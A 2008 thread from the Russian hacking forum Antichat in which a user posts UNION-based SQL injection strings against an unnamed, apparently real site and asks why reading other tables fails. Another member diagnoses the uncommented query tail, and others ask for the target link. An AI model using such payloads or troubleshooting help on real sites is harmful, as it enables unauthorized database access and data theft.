ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql-injection трабл
  #1  
Старый 10.08.2008, 23:17
Аватар для ty13r
ty13r
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605

Репутация: 13
Отправить сообщение для ty13r с помощью ICQ
По умолчанию sql-injection трабл

Имеется инъекция типа
Код:
http://site/cat/'SQL
где видимо применен mod_rewrite
запрос типа
Код:
http://site/cat/' union select 1,2,3,4
прекрасно выполняется, даже есть поля выводимые на экране, но если попробовать выбрать данные из другой таблицы, например
Код:
http://site/cat/' union select 1,2,3,4 from information_schema.tables
, то возникает ошибка
Причем ошибка появляется и в тестовом случае
Код:
http://site/cat/' union select 1,2,3,4 from (selest 1) as test
хотя версия Mysql - 5.0.51
В чем проблемы?
 
Ответить с цитированием

  #2  
Старый 10.08.2008, 23:26
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Вариантов куча, ни ссылки, ни ошибки, хочешь что-бы все угадывали?
 
Ответить с цитированием

  #3  
Старый 10.08.2008, 23:34
Аватар для Qwazar
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от ty13r  
В чем проблемы?
Ты оставшуюся часть запроса не закомментил, от того и проблемы.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #4  
Старый 11.08.2008, 01:26
Аватар для DimOnOID
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию

ссылко в пм или сюда)
 
Ответить с цитированием

  #5  
Старый 11.08.2008, 05:31
Аватар для DDoSька
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Экстрасенсы все на передачку уехали,среди нас не осталось.Ты ссыль дай,а то так "серетишся",как буд-то Aol похекал....ССылку лучше сюда,а не в ПМ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ